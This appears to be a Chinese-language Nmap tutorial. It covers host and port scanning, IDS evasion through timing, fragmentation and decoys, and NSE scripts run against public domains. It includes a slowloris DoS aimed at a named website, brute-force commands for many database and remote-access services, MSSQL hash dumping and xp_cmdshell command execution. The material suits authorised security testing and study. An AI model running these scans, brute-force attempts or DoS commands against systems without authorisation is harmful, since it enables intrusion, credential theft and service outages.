Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端,确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统,正如大多数被用于网络安全的工具,Nmap也是不少黑客及骇客爱用的工具,系统管理员可以利用Nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用Nmap来搜集目标电脑的网络设定,从而计划攻击的方法.
### 主机发现扫描
批量Ping探测: -sP参数,用来批量扫描一个网段的主机存活数,这里的结果只会显示在线的主机.
[root@localhost ~]# nmap -sP 192.168.1.0/24 > scan.log
[root@localhost ~]# cat scan.log | grep "Nmap scan" | awk '{print $5}'
跳过Ping探测: 有些主机关闭了ping检测,所以可以使用-P0跳过ping的探测,这样可加快扫描速度.
[root@localhost ~]# nmap -P0 192.168.1.7
计算网段主机IP: 仅列出指定网段上的每台主机,不发送任何报文到目标主机.
[root@localhost ~]# nmap -sL 192.168.1.0/24 > scan.log
[root@localhost ~]# cat scan.log | grep "Nmap scan" | awk '{print $5}'
扫描在线主机: 扫描一个网段的在线主机列表,功能类似于批量ping检测存活主机.
[root@localhost ~]# nmap -sn 27.201.193.0/24
[root@localhost ~]# cat scan.log | grep "Nmap scan" | awk '{print $5}'
扫描IP地址范围: 指定探测的网段,看是否在线.
[root@localhost ~]# nmap -sP 192.168.1.1-10
[root@localhost ~]# nmap -sP 27.201.193.100-200
探测开放端口(TCP/UDP): 探测目标主机开放的端口,可指定一个以逗号分隔的端口列表,如(-pS22,443,80).
[root@localhost ~]# nmap -pS22,80,443 192.168.1.10 // TCP探测
[root@localhost ~]# nmap -pU22,80,443 192.168.1.10 // UDP探测
[root@localhost ~]# nmap -p smtp,http,https 192.168.1.10
探测主机(SYN/TCP/UDP)扫描: SYN半开放扫描,TCP开放扫描.
[root@localhost ~]# nmap -sS 192.168.1.10 //SYN扫描
[root@localhost ~]# nmap -sT 192.168.1.10 // tcp
[root@localhost ~]# nmap -sU 192.168.1.10 // UDP扫描
[root@localhost ~]# nmap -sA 192.168.1.10 // TCP ACK扫描
主机协议探测: IP协议扫描,可以确定目标机支持哪些IP协议(TCP, ICMP, IGMP).
[root@localhost ~]# nmap -sO 192.168.1.10 | grep '^[0-9]'
1 open icmp
6 open tcp
7 open udp
探测目标系统: 扫描探测目标主机操作系统,这里结果仅供参考有时候并不准确.
[root@localhost ~]# nmap -O 192.168.1.10 | grep "Running:"
Running: Microsoft Windows 2000 | XP
探测服务版本: 用于扫描目标主机服务的具体版本号.
[root@localhost ~]# nmap -sV 192.168.1.10 | grep '^[0-9]'
80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
3306/tcp open mysql MySQL 5.5.53
139/tcp open netbios-ssn
443/tcp open ssl/http VMware VirtualCenter Web service
445/tcp closed microsoft-ds
912/tcp open vmware-auth VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
跟踪报文(tracert): 跟踪发送和接收报文的数据流向.
[root@localhost ~]# nmap --packet-trace 192.168.1.10
SENT (4.7014s) TCP 192.168.1.30:50000 > 192.168.1.10:3527 S
SENT (4.7100s) TCP 192.168.1.30:50000 > 192.168.1.10:4446 S
输出本机接口: 输出检测到的接口列表和系统路由
root@localhost ~]# nmap --iflist 192.168.1.10
扫描多台主机: 一次性扫描多台目标主机,与网段扫描不相同.
[root@localhost ~]# nmap -sP 192.168.1.10 192.168.1.20
[root@localhost ~]# nmap -sP 192.168.1.10 192.168.1.20 192.168.1.30
扫描时排除主机:
nmap 10.0.1.161-162 --exclude 10.0.1.162 // 排除单个主机
nmap 10.0.1.161-163 --exclude 10.0.1.162-163 // 排除连续主机
nmap 10.0.1.161-163 --exclude 10.0.1.161,10.0.1.163 //排除分散主机
nmap 10.0.1.161-163 --excludefile ex.txt // 排除文件里的主机
控制扫描时间: 调整探测报文的时间间隔,防止在单一主机上等待时间过长.
[root@localhost ~]# nmap --scan-delay 1 192.168.1.10
[root@localhost ~]# nmap --max-scan-delay 1 192.168.1.10 // 表示最多等待1秒
[root@localhost ~]# nmap --max-retries 1 192.168.1.10 // 数据包最多重传1次
输出指定格式: 通过相关选项,可以让Nmap输出指定的文件格式.
[root@localhost ~]# nmap -oX lyshark.xml 192.168.1.10 // 以XML格式输出扫描结果
[root@localhost ~]# nmap -oN lyshark.log 192.168.1.10 // 以标准格式输出到文本
[root@localhost ~]# nmap -oG lyshark.log 192.168.1.10 // 以Grep可识别的格式输出
导入扫描文件: 从一个文件中导入IP地址,并进行扫描.
[root@localhost ~]# cat lyshark.log
localhost
www.baidu.com
192.168.1.7
[root@localhost ~]# nmap -iL lyshark.log
### 防火墙的规避
规避IDS检测: 通过设置时间模板(<Paranoid=0|Sneaky=1)的方式,来规避IDS的检测.
[root@localhost ~]# nmap -T0 192.168.1.10
[root@localhost ~]# nmap -T1 192.168.1.10
报文分段探测: 将TCP头分段在几个包中,使得包过滤器、IDS以及其它工具的检测更加困难.
[root@localhost ~]# nmap -f 192.168.1.10 // 自动分段
[root@localhost ~]# nmap --mtu 4/8/16 192.168.1.10 // 自定义分段,必须是4的倍数
使用诱饵绕过: 使用诱饵隐蔽扫描,此处也可用自己的真实IP作为诱饵.
[root@localhost ~]# nmap -D 192.168.1.1 192.168.1.10
### 使用扫描脚本
Nmap不仅用于端口扫描,服务检测,其还具有强大的脚本功能,利用Nmap Script可以快速探测服务器,一般情况下,常用的扫描脚本会放在/usr/share/nmap/script目录下,并且脚本扩招名为*.nse后缀的,接下来将介绍最常用的扫描脚本.
扫描WEB敏感目录: 通过使用--script=http-enum.nse可以扫描网站的敏感目录.
[root@localhost ~]# nmap -p 80 --script=http-enum.nse www.mkdirs.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 01:49 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000010s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
80/tcp open http
| http-enum:
| /login.php: Possible admin folder
| /robots.txt: Robots file
| /config/: Potentially interesting folder w/ directory listing
| /docs/: Potentially interesting folder w/ directory listing
| /external/: Potentially interesting folder w/ directory listing
|_ /icons/: Potentially interesting folder w/ directory listing
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 1.18 seconds
绕开鉴权: 负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令.
[root@localhost ~]# nmap --script=auth www.mkdirs.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:16 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0000090s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 6 Oct 30 19:45 pub
22/tcp open ssh
25/tcp open smtp
| smtp-enum-users:
|_ root
80/tcp open http
| http-domino-enum-passwords:
|_ ERROR: No valid credentials were found
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 0.89 seconds
默认脚本扫描: 脚本扫描,主要是搜集各种应用服务的信息,收集到后可再针对具体服务进行攻击.
[root@localhost ~]# nmap --script=default www.mkdirs.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:21 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000010s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 6 Oct 30 19:45 pub
22/tcp open ssh
| ssh-hostkey: 2048 c2:89:44:fc:e3:1b:5a:65:a1:6e:11:34:73:6d:d5:04 (RSA)
|_256 54:0e:d4:47:2f:b2:d4:2b:33:b6:d8:35:66:2d:a2:aa (ECDSA)
3306/tcp open mysql
| mysql-info: Protocol: 10
| Version: 5.5.60-MariaDB
| Thread ID: 10408
| Status: Autocommit
|_Salt: <D"y]F(2
Nmap done: 1 IP address (1 host up) scanned in 1.06 seconds
检测常见漏洞: 通过使用--script=luln,可以扫描网站的常见漏洞,以及网页的目录结构.
[root@localhost ~]# nmap --script=vuln www.mkdirs.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:24 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000017s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
80/tcp open http
| http-enum:
| /login.php: Possible admin folder
| /robots.txt: Robots file
| /config/: Potentially interesting folder w/ directory listing
| /docs/: Potentially interesting folder w/ directory listing
| /external/: Potentially interesting folder w/ directory listing
|_ /icons/: Potentially interesting folder w/ directory listing
|_http-fileupload-exploiter:
|_http-frontpage-login: false
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds
内网服务探测: 通过使用--script=broadcast,可以实现在局域网内探查更多服务开启状况.
[root@localhost ~]# nmap -n -p445 --script=broadcast 127.0.0.1
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:28 EDT
Pre-scan script results:
| broadcast-dhcp-discover:
| IP Offered: 192.168.1.14
| Server Identifier: 192.168.1.1
| Subnet Mask: 255.255.255.0
| Router: 192.168.1.1
|_ Domain Name Server: 192.168.1.1
| broadcast-eigrp-discovery:
|_ ERROR: Couldn't get an A.S value.
| broadcast-listener:
| ether
| ARP Request
| sender ip sender mac target ip
| 192.168.1.1 43:72:23:04:56:21 192.168.1.2
| 192.168.1.2 B4:8C:28:BE:4C:34 192.168.1.1
| EIGRP Update
........
进行WhoIS查询: 通过使用--script whois模块,可以查询网站的简单信息.
[root@localhost ~]# nmap --script whois www.baidu.com
Host script results:
| whois: Record found at whois.apnic.net
| inetnum: 61.135.0.0 - 61.135.255.255
| netname: UNICOM-BJ
| descr: China Unicom Beijing province network
| country: CN
| person: ChinaUnicom Hostmaster
|_email: hqs-ipabuse@chinaunicom.cn
Nmap done: 1 IP address (1 host up) scanned in 4.76 seconds
详细WhoIS解析: 利用第三方的数据库或资源,查询详细的WhoIS解析情况.
[root@localhost ~]# nmap --script external www.baidu.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:31 EDT
Nmap scan report for www.baidu.com (61.135.169.125)
Host is up (0.018s latency).
|_http-robtex-shared-ns: ERROR: Script execution failed (use -d to debug)
| ip-geolocation-geoplugin:
| 61.135.169.125 (www.baidu.com)
| coordinates (lat,lon): 39.9288,116.3889
|_ state: Beijing, China
|_ip-geolocation-maxmind: ERROR: Script execution failed (use -d to debug)
| whois: Record found at whois.apnic.net
| inetnum: 61.135.0.0 - 61.135.255.255
| netname: UNICOM-BJ
| descr: China Unicom Beijing province network
|_country: CN
.....
发现内网网关: 通过使用--script=broadcast-netbios-master-browser可以发现内网网关的地址.
[root@localhost ~]# nmap --script=broadcast-netbios-master-browser 192.168.1.1
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:05 EDT
Pre-scan script results:
| broadcast-netbios-master-browser:
| ip server domain
|_192.168.1.2 Web-Server WORKGROUP
Nmap scan report for 192.168.1.1
Host is up (0.0011s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
80/tcp filtered http
1900/tcp open upnp
MAC Address: 42:1C:1B:E7:B1:B2 (TP-Link)
发现WEB中Robots文件: 通过使用--script=http-robots.txt.nse可以检测到robots文件内容.
[root@localhost scripts]# nmap --script=http-robots.txt.nse www.baidu.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:12 EDT
Nmap scan report for www.baidu.com (61.135.169.125)
Host is up (0.019s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.121
Not shown: 998 filtered ports
PORT STATE SERVICE
80/tcp open http
| http-robots.txt: 9 disallowed entries
| /baidu /s? /ulink? /link? /home/news/data/ /shifen/
|_/homepage/ /cpro /
443/tcp open https
| http-robots.txt: 9 disallowed entries
| /baidu /s? /ulink? /link? /home/news/data/ /shifen/
|_/homepage/ /cpro /
Nmap done: 1 IP address (1 host up) scanned in 5.06 seconds
检查WEB服务器时间: 检查web服务器的当前时间.
[root@localhost scripts]# nmap -p 443 --script http-date.nse www.baidu.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:16 EDT
Nmap scan report for www.baidu.com (61.135.169.121)
Host is up (0.017s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.125
PORT STATE SERVICE
443/tcp open https
|_http-date: Sun, 31 Mar 2019 06:16:53 GMT; 0s from local time.
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
执行DOS攻击: dos攻击,对于处理能力较小的站点还挺好用的.
[root@localhost ~]# nmap --script http-slowloris --max-parallelism 1000 www.mkdirs.com
Warning: Your max-parallelism (-M) option is extraordinarily high, which can hurt reliability
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:21 EDT
检查DNS子域: 检查目标ns服务器是否允许传送,如果能,直接把子域拖出来就好了.
[root@localhost scripts]# nmap -p 53 --script dns-zone-transfer.nse -v www.baidu.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:28 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating Ping Scan at 02:28
Scanning www.baidu.com (61.135.169.121) [4 ports]
Completed Ping Scan at 02:28, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:28
Completed Parallel DNS resolution of 1 host. at 02:28, 0.01s elapsed
Initiating SYN Stealth Scan at 02:28
Scanning www.baidu.com (61.135.169.121) [1 port]
Completed SYN Stealth Scan at 02:28, 0.20s elapsed (1 total ports)
NSE: Script scanning 61.135.169.121.
Nmap scan report for www.baidu.com (61.135.169.121)
Host is up (0.016s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.125
PORT STATE SERVICE
53/tcp filtered domain
NSE: Script Post-scanning.
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
Raw packets sent: 6 (240B) | Rcvd: 1 (28B)
查询WEB旁站: 旁站查询,ip2hosts接口该接口似乎早已停用,如果想继续用,可自行到脚本里把接口部分的代码改掉.
[root@localhost scripts]# nmap -p80 --script hostmap-ip2hosts.nse www.baidu.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:29 EDT
Nmap scan report for www.baidu.com (61.135.169.121)
Host is up (0.017s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.125
PORT STATE SERVICE
80/tcp open http
Host script results:
| hostmap-ip2hosts:
|_ hosts: Error: could not GET http://www.ip2hosts.com/csv.php?ip=61.135.169.121
Nmap done: 1 IP address (1 host up) scanned in 5.89 seconds
### 口令爆破模块
暴力破解DNS记录: 这里以破解百度的域名为例子,由于内容较多这里简化显示.
[root@localhost scripts]# nmap --script=dns-brute.nse www.baidu.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 03:19 EDT
Nmap scan report for www.baidu.com (61.135.169.125)
Host is up (0.018s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.121
Not shown: 998 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Host script results:
| dns-brute:
| DNS Brute-force hostnames
| lab.baidu.com - 180.149.144.192
| lab.baidu.com - 180.149.132.122
| corp.baidu.com - 123.129.254.12
|_ log.baidu.com - 10.26.39.14
Nmap done: 1 IP address (1 host up) scanned in 10.58 seconds
内网VNC扫描: 通过使用脚本,检查VNC版本等一些敏感信息.
[root@localhost ~]# nmap --script=realvnc-auth-bypass 127.0.0.1 #检查VNC版本
[root@localhost ~]# nmap --script=vnc-auth 127.0.0.1 #检查VNC认证方式
[root@localhost ~]# nmap --script=vnc-info 127.0.0.1 #获取VNC信息
[root@localhost ~]# nmap --script=vnc-brute.nse --script-args=userdb=/user.txt,passdb=/pass.txt 127.0.0.1 #暴力破解VNC密码
内网SMB扫描: 检查局域网中的Samba服务器,以及对服务器的暴力破解.
[root@localhost ~]# nmap --script=smb-brute.nse 127.0.0.1 #简单尝试破解SMB服务
[root@localhost ~]# nmap --script=smb-check-vulns.nse --script-args=unsafe=1 127.0.0.1 #SMB已知几个严重漏
[root@localhost ~]# nmap --script=smb-brute.nse --script-args=userdb=/user.txt,passdb=/pass.txt 127.0.0.1 #通过传递字段文件,进行暴力破解
[root@localhost ~]# nmap -p445 -n --script=smb-psexec --script-args=smbuser=admin,smbpass=1233 127.0.0.1 #查询主机一些敏感信息:nmap_service
[root@localhost ~]# nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=admin,smbpass=1233 127.0.0.1 #查看会话
[root@localhost ~]# nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=admin,smbpass=1233 127.0.0.1 #查看系统信息
MSSQL扫描: 检查局域网中的SQL Server服务器,以及对服务器的暴力破解.
[root@localhost ~]# nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 127.0.0.1 #暴力破解MSSQL密码
[root@localhost ~]# nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa 127.0.0.1 #dumphash值
[root@localhost ~]# nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4 xp_cmdshell #执行命令
MYSQL扫描: 检查局域网中的MySQL服务器,以及对服务器的暴力破解.
[root@localhost ~]# nmap -p3306 --script=mysql-empty-password.nse 127.0.0.1 #扫描root空口令
[root@localhost ~]# nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 127.0.0.1 #列出所有用户
[root@localhost ~]# nmap -p3306 --script=mysql-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 127.0.0.1 #暴力破解MYSQL口令
Oracle扫描: 检查局域网中的Oracle服务器,以及对服务器的暴力破解.
[root@localhost ~]# nmap --script=oracle-sid-brute -p 1521-1560 127.0.0.1 #oracle sid扫描
[root@localhost ~]# nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 127.0.0.1 #oracle弱口令破解
爆破Telnet:
nmap -p 23 --script telnet-brute
--script-args userdb=myusers.lst,passdb=.mypwds.lst,telnet-brute.timeout=8s 192.168.1.103
nmap --script=broadcast-netbios-master-browser 192.168.137.4 发现网关
nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4 破解rsync
nmap --script informix-brute -p 9088 192.168.137.4 informix数据库破解
nmap -p 5432 --script pgsql-brute 192.168.137.4 pgsql破解
nmap -sU --script snmp-brute 192.168.137.4 snmp破解
nmap -sV --script=telnet-brute 192.168.137.4 telnet破解
nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' <target> jboss autopwn
nmap --script=http-methods.nse 192.168.137.4 检查http方法
nmap --script http-slowloris --max-parallelism 400 192.168.137.4 dos攻击,对于处理能力较小的站点还挺好用的 'half-HTTP' connections
nmap --script=samba-vuln-cve-2012-1182 -p 139 192.168.137.4
nmap -iR 1000 -sS -PS80 -p 80 -oG nmap.txt
Nmap 变成漏扫使用
1.去 https://github.com/scipag/vulscan 下载项目,并整个解压到nmap 的script目录下,然后执命令
nmap -sV --script=vulscan/vulscan.nse
#使用默认的库进行漏洞扫描
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=cve.csv [ip]
#使用特定的库cve.csv扫描
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=exploitdb.csv [ip]
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=securitytracker.csv [ip]
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=xforce.csv [ip]
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=scipvuldb.csv [ip]
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=openvas.csv [ip]
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=xforce.csv [ip]
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=osvdb.csv [ip]